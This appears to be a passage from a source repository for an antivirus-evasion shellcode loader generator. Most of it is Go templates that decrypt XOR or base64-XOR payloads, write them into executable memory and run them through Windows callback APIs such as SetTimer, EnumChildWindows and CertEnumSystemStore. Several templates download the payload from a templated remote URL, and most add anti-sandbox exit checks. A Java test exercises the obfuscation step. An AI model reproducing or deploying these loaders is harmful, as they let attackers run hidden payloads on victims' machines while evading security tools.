byteData := DecryptData(string(ciphertext)) 73 | Callback(byteData) 74 | } 75 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/EMBEDDED/go_SetTimer.go: 
-------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | g_InitOnce [0]byte 11 | lpContext [0]byte 12 | ) 13 | 14 | type MSG struct { 15 | } 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | dummy = 0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | User32 = syscall.NewLazyDLL("User32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | SetTimer = User32.NewProc("SetTimer") 31 | GetMessageW = User32.NewProc("GetMessageW") 32 | DispatchMessageW = User32.NewProc("DispatchMessageW") 33 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 34 | ) 35 | 36 | func Callback(shellcode []byte) { 37 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | msg := MSG{} 40 | SetTimer.Call(NULL, dummy, NULL, addr) 41 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 42 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 43 | } 44 | 45 | func XorDecrypt(plaintext []byte, key []byte) []byte { 46 | ciphertext := make([]byte, len(plaintext)) 47 | keyLength := len(key) 48 | for i, byte := range plaintext { 49 | keyByte := key[i%keyLength] 50 | encryptedByte := byte ^ keyByte 51 | ciphertext[i] = encryptedByte 52 | } 53 | return ciphertext 54 | } 55 | 56 | func DecryptData(shellcode []byte) []byte { 57 | key := []byte{{{Key}}} 58 | decryptShellcode := XorDecrypt(shellcode, key) 59 | return decryptShellcode 60 | } 61 | 62 | func main() { 63 | args := os.Args[0] 64 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 65 | os.Exit(0) 66 | } 67 | 68 | ciphertext := []byte{{{Shellcode}}} 69 | byteData := DecryptData(ciphertext) 70 | 
Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/REMOTE/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "encoding/base64" 5 | "golang.org/x/sys/windows" 6 | "time" 7 | "unsafe" 8 | "math/rand" 9 | "os" 10 | "github.com/valyala/fasthttp" 11 | "syscall" 12 | ) 13 | 14 | func XorDecrypt(plaintext []byte, key []byte) []byte { 15 | ciphertext := make([]byte, len(plaintext)) 16 | keyLength := len(key) 17 | for i, byte := range plaintext { 18 | keyByte := key[i % keyLength] 19 | encryptedByte := byte ^ keyByte 20 | ciphertext[i] = encryptedByte 21 | } 22 | return ciphertext 23 | } 24 | 25 | func DecryptData(v2 string) []byte { 26 | key := []byte{{{Key}}} 27 | v22, _ := base64.StdEncoding.DecodeString(v2) 28 | v222 := XorDecrypt(v22, key) 29 | return v222 30 | } 31 | 32 | func WriteMemory(inbuf []byte, destination uintptr) { 33 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 34 | writePtr := unsafe.Pointer(destination + uintptr(index)) 35 | v := (*byte)(writePtr) 36 | *v = inbuf[index] 37 | } 38 | } 39 | 40 | func Ldr1(calc []byte) { 41 | 42 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 43 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 44 | calc_len := uintptr(len(calc)) 45 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 46 | WriteMemory(calc, Ptr1) 47 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 48 | } 49 | 50 | func Sleeeep() { 51 | res := 1 52 | for i := 0; i < 5; i++ { 53 | number := rand.Intn(900) + 100 54 | res *= number 55 | } 56 | time.Sleep(10 * time.Second) 57 | } 58 | 59 | 60 | func fetchShellcode() []byte { 61 | 62 | url := "{{REMOTE_URL}}" 63 | 64 | _, body, _ := fasthttp.Get(nil, url) 65 | 66 | return body 67 | } 68 | 69 | func main() { 70 | 71 | args := os.Args[0] 72 | 
if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 73 | os.Exit(0) 74 | } 75 | 76 | Sleeeep() 77 | 78 | ciphertext := fetchShellcode() 79 | 80 | byteData := DecryptData(string(ciphertext)) 81 | 82 | Ldr1(byteData) 83 | 84 | } -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/TextFileProcessorTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.io.IOException; 6 | import java.nio.file.Files; 7 | import java.nio.file.Paths; 8 | import java.util.Arrays; 9 | import java.util.List; 10 | 11 | import static com.yutian4060.avevasioncraftonline.utils.FileUtils.readFileBytes; 12 | import static com.yutian4060.avevasioncraftonline.utils.TextFileProcessor.*; 13 | 14 | class TextFileProcessorTest { 15 | 16 | @Test 17 | void replaceVariableNamesTest() { 18 | String code = """ 19 | func fetchShellcode(string url); 20 | func delayedLoading(); 21 | func checkDomain(); 22 | """; 23 | 24 | List functionNamesToReplace = Arrays.asList( 25 | // c 26 | "calc_payload", "payload_len", "calcSt", "calcTH", "oldProtectCalc", 27 | // nim 28 | "tId", "tHandle", "pHandle", "rPtr", "bytesWritten", 29 | // golang 30 | "fetchShellcode", "delayedLoading", "checkDomain" 31 | ); 32 | System.out.printf("replaceVariableNamesTest: %s\n", replaceFunctionNames(code, functionNamesToReplace));; 33 | } 34 | 35 | @Test 36 | void convertToHexStringWithoutPrefixTest() { 37 | 38 | String filePath = "C:\\1bypassAVOnline\\calc.bin"; 39 | System.out.printf("convertToHexStringWithoutPrefixTest: %s\n", convertToHexStringWithoutPrefix(readFileBytes(filePath))); 40 | 41 | 42 | } 43 | 44 | 45 | @Test 46 | void antiSandboxTest() { 47 | List antiSandbox = List.of(1001, 1002); 48 | String filePath = "C:\\1bypassAVOnline\\antisandbox\\out.go"; 49 | 
50 | try { 51 | String content = Files.readString(Paths.get(filePath)); 52 | antiSandbox(content, antiSandbox); 53 | } catch (IOException e) { 54 | // 处理文件读取错误 55 | e.printStackTrace(); 56 | } 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/REMOTE/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | CAL_SMONTHNAME1 = 0x00000015 20 | ENUM_ALL_CALENDARS = 0xffffffff 21 | SORT_DEFAULT = 0x0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | User32 = syscall.NewLazyDLL("User32.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | EnumChildWindows = User32.NewProc("EnumChildWindows") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | if err != nil && err.Error() != "The operation completed successfully." 
{ 36 | syscall.Exit(0) 37 | } 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | EnumChildWindows.Call(0, addr, 0) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func fetchShellcode(url string) []byte { 60 | _, body, _ := fasthttp.Get(nil, url) 61 | return body 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 71 | byteData := DecryptData(ciphertext) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/EMBEDDED/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | FALSE = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 27 | SymInitialize = Dbghelp.NewProc("SymInitialize") 28 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 
32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | Proces, _, _ := GetCurrentProcess.Call() 39 | SymInitialize.Call(Proces, 0, FALSE) 40 | SymEnumProcesses.Call(addr, 0) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func main() { 62 | args := os.Args[0] 63 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 64 | os.Exit(0) 65 | } 66 | 67 | ciphertext := "{{Shellcode}}" 68 | byteData := DecryptData(ciphertext) 69 | Callback(byteData) 70 | } 71 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/REMOTE/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 21 | ntdll = syscall.NewLazyDLL("ntdll.dll") 22 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 23 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 24 | RtlMoveMemory = 
ntdll.NewProc("RtlMoveMemory") 25 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | if err != nil && err.Error() != "The operation completed successfully." { 31 | syscall.Exit(0) 32 | } 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 35 | 36 | } 37 | 38 | func XorDecrypt(plaintext []byte, key []byte) []byte { 39 | ciphertext := make([]byte, len(plaintext)) 40 | keyLength := len(key) 41 | for i, byte := range plaintext { 42 | keyByte := key[i%keyLength] 43 | encryptedByte := byte ^ keyByte 44 | ciphertext[i] = encryptedByte 45 | } 46 | return ciphertext 47 | } 48 | 49 | func DecryptData(v2 string) []byte { 50 | key := []byte{{{Key}}} 51 | v22, _ := base64.StdEncoding.DecodeString(v2) 52 | v222 := XorDecrypt(v22, key) 53 | return v222 54 | } 55 | 56 | func fetchShellcode(url string) []byte { 57 | _, body, _ := fasthttp.Get(nil, url) 58 | return body 59 | } 60 | 61 | func main() { 62 | args := os.Args[0] 63 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 64 | os.Exit(0) 65 | } 66 | 67 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 68 | byteData := DecryptData(string(ciphertext)) 69 | Callback(byteData) 70 | } 71 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/LOCAL/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | 
RESOURCE_ENUM_VALIDATE = 0x0008 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 28 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | 36 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 37 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 38 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 66 | if err != nil { 67 | return 68 | } 69 | byteData := DecryptData(string(ciphertext)) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/EMBEDDED/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 
| 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | type MSG struct { 16 | } 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | dummy = 0 24 | ) 25 | 26 | var ( 27 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 28 | ntdll = syscall.NewLazyDLL("ntdll.dll") 29 | User32 = syscall.NewLazyDLL("User32.dll") 30 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 31 | SetTimer = User32.NewProc("SetTimer") 32 | GetMessageW = User32.NewProc("GetMessageW") 33 | DispatchMessageW = User32.NewProc("DispatchMessageW") 34 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 35 | ) 36 | 37 | func Callback(shellcode []byte) { 38 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | msg := MSG{} 41 | SetTimer.Call(NULL, dummy, NULL, addr) 42 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 43 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 44 | } 45 | 46 | func XorDecrypt(plaintext []byte, key []byte) []byte { 47 | ciphertext := make([]byte, len(plaintext)) 48 | keyLength := len(key) 49 | for i, byte := range plaintext { 50 | keyByte := key[i%keyLength] 51 | encryptedByte := byte ^ keyByte 52 | ciphertext[i] = encryptedByte 53 | } 54 | return ciphertext 55 | } 56 | 57 | func DecryptData(v2 string) []byte { 58 | key := []byte{{{Key}}} 59 | v22, _ := base64.StdEncoding.DecodeString(v2) 60 | v222 := XorDecrypt(v22, key) 61 | return v222 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := "{{Shellcode}}" 71 | byteData := DecryptData(ciphertext) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- 
/template/go/go_SymEnumProcesses/xor/LOCAL/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | FALSE = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | SymInitialize = Dbghelp.NewProc("SymInitialize") 27 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." 
{ 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | Proces, _, _ := GetCurrentProcess.Call() 38 | SymInitialize.Call(Proces, 0, FALSE) 39 | SymEnumProcesses.Call(addr, 0) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 66 | if err != nil { 67 | return 68 | } 69 | byteData := DecryptData(ciphertext) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/REMOTE/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | if1 [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 28 | FlsAlloc = kernel32.NewProc("FlsAlloc") 29 | FlsSetValue = kernel32.NewProc("FlsSetValue") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode 
[]byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dIndex, _, _ := FlsAlloc.Call(addr) 37 | dummy, _ := syscall.UTF16PtrFromString("dummy") 38 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func fetchShellcode(url string) []byte { 60 | _, body, _ := fasthttp.Get(nil, url) 61 | return body 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 71 | byteData := DecryptData(string(ciphertext)) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/LOCAL/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | g_InitOnce [0]byte 11 | lpContext [0]byte 12 | ) 13 | 14 | type MSG struct { 15 | } 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | dummy = 0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | User32 = syscall.NewLazyDLL("User32.dll") 29 | VirtualAlloc = 
kernel32.NewProc("VirtualAlloc") 30 | SetTimer = User32.NewProc("SetTimer") 31 | GetMessageW = User32.NewProc("GetMessageW") 32 | DispatchMessageW = User32.NewProc("DispatchMessageW") 33 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 34 | ) 35 | 36 | func Callback(shellcode []byte) { 37 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | msg := MSG{} 40 | SetTimer.Call(NULL, dummy, NULL, addr) 41 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 42 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 43 | } 44 | 45 | func XorDecrypt(plaintext []byte, key []byte) []byte { 46 | ciphertext := make([]byte, len(plaintext)) 47 | keyLength := len(key) 48 | for i, byte := range plaintext { 49 | keyByte := key[i%keyLength] 50 | encryptedByte := byte ^ keyByte 51 | ciphertext[i] = encryptedByte 52 | } 53 | return ciphertext 54 | } 55 | 56 | func DecryptData(shellcode []byte) []byte { 57 | key := []byte{{{Key}}} 58 | decryptShellcode := XorDecrypt(shellcode, key) 59 | return decryptShellcode 60 | } 61 | 62 | func main() { 63 | args := os.Args[0] 64 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 65 | os.Exit(0) 66 | } 67 | 68 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 69 | if err != nil { 70 | return 71 | } 72 | byteData := DecryptData(ciphertext) 73 | Callback(byteData) 74 | } 75 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/REMOTE/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | 
PAGE_EXECUTE_READWRITE = 0x40 20 | CAL_SMONTHNAME1 = 0x00000015 21 | ENUM_ALL_CALENDARS = 0xffffffff 22 | SORT_DEFAULT = 0x0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | User32 = syscall.NewLazyDLL("User32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | EnumChildWindows = User32.NewProc("EnumChildWindows") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | if err != nil && err.Error() != "The operation completed successfully." { 37 | syscall.Exit(0) 38 | } 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | EnumChildWindows.Call(0, addr, 0) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func fetchShellcode(url string) []byte { 62 | _, body, _ := fasthttp.Get(nil, url) 63 | return body 64 | } 65 | 66 | func main() { 67 | args := os.Args[0] 68 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 69 | os.Exit(0) 70 | } 71 | 72 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 73 | byteData := DecryptData(string(ciphertext)) 74 | Callback(byteData) 75 | } 76 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/REMOTE/go_EnumResourceTypesExW.go: 
